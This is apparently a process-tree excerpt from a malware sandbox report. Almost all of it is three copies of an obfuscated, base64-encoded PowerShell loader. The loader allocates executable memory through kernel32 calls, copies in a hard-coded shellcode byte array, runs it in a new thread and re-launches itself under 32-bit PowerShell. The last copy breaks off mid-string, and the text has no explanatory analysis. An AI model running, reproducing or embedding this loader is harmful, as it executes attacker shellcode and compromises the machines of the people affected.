powershell -w 1 -C "sv lI -;sv mJz ec;sv qgU ((gv lI).value.toString()+(gv mJz).value.toString());powershell (gv qgU).value.toString() 'JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA='"
3⤵
PID:3436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABGAFEAcwAgAD0AIAAnACQAWQBmAEEAagAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABZAGYAQQBqACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAZQAsADAAeAAxADMALAAwAHgAZAA4ACwAMAB4AGMAYQAsADAAeAAxAGUALAAwAHgAZABiACwAMAB4AGMAZgAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAA4ADMALAAwAHgAYwAzACwAMAB4ADAANAAsADAAeAAzADEALAAwAHgANwAzACwAMAB4ADAAZQAsADAAeAAwADMALAAwAHgANgAwACwAMAB4AGQANgAsADAAeAAyADgALAAwAHgAZQBiACwAMAB4ADcAYQAsADAAeAAwAGUALAAwAHgAMgAzACwAMAB4ADEANAAsADAAeAA4ADIALAAwAHgAYwBmACwAMAB4ADUAYwAsADAAeAA5AGMALAAwAHgANgA3ACwAMAB4AGYAZQAsADAAeAA0AGUALAAwAHgAZgBhACwAMAB4AGUAYwAsADAAeAA1ADMALAAwAHgANQBmACwAMAB4ADgAOAAsADAAeABhADAALAAwAHgANQBmACwAMAB4ADEANAAsADAAeABkAGMALAAwAHgANQAwACwAMAB4AGUAYgAsADAAeAA1ADgALAAwAHgAYwA5ACwAMAB4ADYAOQAsADAAeAAxADQALAAwAHgAOQAzACwAMAB4AGIAZQAsADAAeABjADMALAAwAHgAYwBjACwAMAB4ADkAZAAsADAAeAAwADAALAAwAHgANwBmACwAMAB4ADIAYwAsADAAeABiAGYALAAwAHgAZgBjACwAMAB4ADcAZAAsADAAeAA2ADEALAAwAHgAMQBmACwAMAB4ADMAYwAsADAAeAA0AGUALAAwAHgANwA0ACwAMAB4ADUAZQAsADAAeAA3ADkALAAwAHgAMQA5ACwAMAB4AGYAMgAsADAAeAA4AGYALAAwAHgAZAA3ACwAMAB4ADEAMgAsADAAeABhAGUALAAwAHgANQBmACwAMAB4ADUAMwAsADAAeAA2ADYALAAwAHgANwAzACwAMAB4ADYAMQAsADAAeABiADMALAAwAHgAMwAxACwAMAB4ADAAMAAsADAAeAAyADEALAAwAHgANABiACwAMAB4ADMAOAAsADAAeABkADYALAAwAHgAZAA2ACwAMAB4AGUANwAsADAAeAA0ADMALAAwAHgAMAA3ACwAMAB4ADkAZAAsADAAeABhADAALAAwAHgANgAzACwAMAB4AGYANwAsADAAeAAyADkALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmADYALAAwAHgAZgBlACwAMAB4ADEAYwAsADAAeABiADIALAAwAHgAOABjACwAMAB4ADMAYwAsADAAeAAyAGUALAAwAHgAYgBiACwAMAB4ADIANAAsADAAeABiADYALAAwAHgANgA0ACwAMAB4AGMAOAAsADAAeABiADYALAAwAHgAMQBlACwAMAB4AGIANQAsADAAeAAwAGUALAAwAHgANwA5ACwAMAB4ADUAMQAsADAAeABiAGIALAAwAHgAMgAyACwAMAB4ADcAYgAsADAAeABhADkALAAwAHgAZgBjACwAMAB4AGQAYQAsADAAeAAwADkALAAwAHgAYwAxACwAMAB4AGYAZQAsADAAeAA2ADcALAAwAHgAMABhACwAMAB4ADEAMgAsADAAeAA3AGMALAAwAHgAYgAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAMgA2ACwAMAB4ADMAMAAsADAAeAAwADcALAAwAHgANgAyACwAMAB4AGQANgAsADAAeAA5ADUALAAwAHgAZABlACwAMAB4AGUAMQAsADAAeABkADQALAAwAHgANQAyACwAMAB4ADkANAAsADAAeABhAGUALAAwAHgAZgA4ACwAMAB4ADYANQAsADAAeAA3ADkALAAwAHgAYwA1ACwAMAB4ADAANQAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADAAYQAsADAAeAA4AGMALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgAZAA0ACwAMAB4ADYAZgAsADAAeABjADIALAAwAHgAOQA3ACwAMAB4AGIAMAAsADAAeABkAGUALAAwAHgAZgBiACwAMAB4AGMAOAAsADAAeAAxAGQALAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA4ADIALAAwAHgAOABjACwAMAB4AGQANgAsADAAeABkAGUALAAwAHgANgBiACwAMAB4ADQAZgAsADAAeABkADcALAAwAHgAOAAyACwAMAB4AGYAYgAsADAAeAA4ADMALAAwAHgAMQA1ACwAMAB4ADMAZAAsADAAeABmAGMALAAwAHgAOABiACwAMAB4ADIAZQAsADAAeAA0AGUALAAwAHgAYwBlACwAMAB4ADEANAAsADAAeAA4ADQALAAwAHgAZAA4ACwAMAB4ADYAMgAsADAAeABkAGMALAAwAHgAMAAyACwAMAB4ADEAZQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4AGIANQAsADAAeABmADAALAAwAHgAYgBjACwAMAB4ADkAYgAsADAAeAA0ADgALAAwAHgAZgAxACwAMAB4AGIAYwAsADAAeABiADIALAAwAHgAOABlACwAMAB4AGEANQAsADAAeABlAGMALAAwAHgAYQBjACwAMAB4ADIANwAsADAAeABjADYALAAwAHgANgA2ACwAMAB4ADIAZAAsADAAeABjADgALAAwAHgAMQAzACwAMAB4ADEAMgAsADAAeAAyADcALAAwAHgANQBlACwAMAB4ADUAYwAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADEAZQAsADAAeAAzADQALAAwAHgAOABlACwAMAB4ADkAMAAsADAAeAAxAGEALAAwAHgANwA5ACwAMAB4ADAANwAsADAAeAA3ADYALAAwAHgANwAyACwAMAB4AGQAMQAsADAAeAA0ADgALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA4ADEALAAwAHgAMgA4ACwAMAB4ADkANwAsADAAeABkAGEALAAwAHgAYwBiACwAMAB4AGEANgAsADAAeABjADgALAAwAHgAZgBhACwAMAB4AGYAMwAsADAAeAA2AGMALAAwAHgANgAxACwAMAB4ADkAMAAsADAAeAAxAGIALAAwAHgAZAA5ACwAMAB4AGQAOQAsADAAeAAwAGMALAAwAHgAOAA1ACwAMAB4ADQAMAAsADAAeAA5ADEALAAwAHgAYQBkACwAMAB4ADQAYQAsADAAeAA1AGYALAAwAHgAZABmACwAMAB4AGUAZAAsADAAeABjADEALAAwAHgANgBjACwAMAB4ADEAZgAsADAAeABhADMALAAwAHgAMgAxACwAMAB4ADEAOAAsADAAeAAzADMALAAwAHgANQAzACwAMAB4AGMAMgAsADAAeAA1ADcALAAwAHgANgA5ACwAMAB4AGYANQAsADAAeABkAGQALAAwAHgANABkACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANABiACwAMAB4ADYAYQAsADAAeAA4AGYALAAwAHgAYQBlACwAMAB4AGUAMwAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4ADkAOAAsADAAeABhAGIALAAwAHgAOABiACwAMAB4AGQAZAAsADAAeAA5ADMALAAwAHgANgAyACwAMAB4ADEAZQAsADAAeAA5AGUALAAwAHgAYwBiACwAMAB4ADgAYQAsADAAeABjAGUALAAwAHgAMQBlACwAMAB4ADAAYgAsADAAeABkAGQALAAwAHgAOAA0ACwAMAB4ADEAZQAsADAAeAA2ADMALAAwAHgAYgA5ACwAMAB4AGYAYwAsADAAeAA0AGMALAAwAHgAOQA2ACwAMAB4AGMANgAsADAAeAAyADgALAAwAHgAZQAxACwAMAB4ADAAYgAsADAAeAA1ADMALAAwAHgAZAAzACwAMAB4ADUAMAAsADAAeABmADgALAAwAHgAZgA0ACwAMAB4AGIAYgAsADAAeAA1AGUALAAwAHgAMgA3ACwAMAB4ADMAMgAsADAAeAA2ADQALAAwAHgAYQAwACwAMAB4ADAAMgAsADAAeABjADIALAAwAHgANQA4ACwAMAB4ADcANwAsADAAeAA2AGEALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeAA0AGIAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAFUAZgBtAHkAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFUAZgBtAHkALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAFUAZgBtAHkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJABGAFEAcwApACkAOwAkAHIAUQB5AGIAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAbgBpAHUAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAbgBpAHUAIAAkAHIAUQB5AGIAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAcgBRAHkAYgAgACQAZQAiADsAfQA=
4⤵
PID:6480

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABZAGYAQQBqACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAWQBmAEEAagAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiAGUALAAwAHgAMQAzACwAMAB4AGQAOAAsADAAeABjAGEALAAwAHgAMQBlACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAYgAsADAAeAAyADkALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAOAAzACwAMAB4AGMAMwAsADAAeAAwADQALAAwAHgAMwAxACwAMAB4ADcAMwAsADAAeAAwAGUALAAwAHgAMAAzACwAMAB4ADYAMAAsADAAeABkADYALAAwAHgAMgA4ACwAMAB4AGUAYgAsADAAeAA3AGEALAAwAHgAMABlACwAMAB4ADIAMwAsADAAeAAxADQ